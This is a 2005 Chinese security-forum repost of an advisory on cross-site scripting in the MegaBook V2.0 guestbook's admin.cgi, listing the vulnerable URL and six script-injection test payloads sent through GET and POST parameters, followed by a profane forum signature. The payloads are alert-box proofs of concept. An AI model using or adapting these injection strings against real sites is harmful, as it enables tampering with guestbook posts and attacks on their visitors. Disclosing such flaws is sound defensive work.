[转载]MegaBook V2.0跨站脚本漏洞测试方法

EvilOctal

团队执行官

Rank: 8 Rank: 8

E.S.T社区执行帐号

帖子: 9869
精华: 771
积分: 40986
阅读权限: 200
性别: 男
在线时间: 3986 小时
注册时间: 2004-7-4
最后登录: 2008-12-3

发短消息
加为好友
当前离线

楼主大中小发表于 2005-5-7 18:14 只看该作者

[转载]MegaBook V2.0跨站脚本漏洞测试方法

文章作者：SpyHat

The ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross Site
Scripting, which will allow the attacker to modify the post in the guestbook. The
affected scripts is admin.cgi

URL: (http://www.(yourdomain).com/(yourcgidir)/admin.cgi)

I have tested the script with the following query:

?action=modifypost&entryid="><script>alert('wvs-xss-magic-string-703410097');</script>

I have also tested the script with theses POST variables:

action=modifypost&entryid=66&password=<script>alert('wvs-xss-magic-string-188784308');</script>

action=modifypost&entryid=66&password='><script>alert('wvs-xss-magic-string-
486624156');</script>

action=modifypost&entryid=66&password="><script>alert('wvs-xss-magic-string-
1852691616');</script>

action=modifypost&entryid=66&password=><script>alert('wvs-xss-magic-string-429380114');</script>

action=modifypost&entryid=66&password=</textarea><script>alert('wvs-xss-magic-
string-723975367');</script>

曾几何时，有人对我说：装B遭雷劈。我说：去你妈的。于是，这个人又对我说：如果再说脏话，上帝会惩罚你的。我说：我操上帝。结论：彪悍的人生不需要上帝。

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 重要安全公告{ Security Advisory Bulletin } » 漏洞分析[ Vulnerability Analyse ] » [转载]MegaBook V2.0跨站脚本漏洞测试方法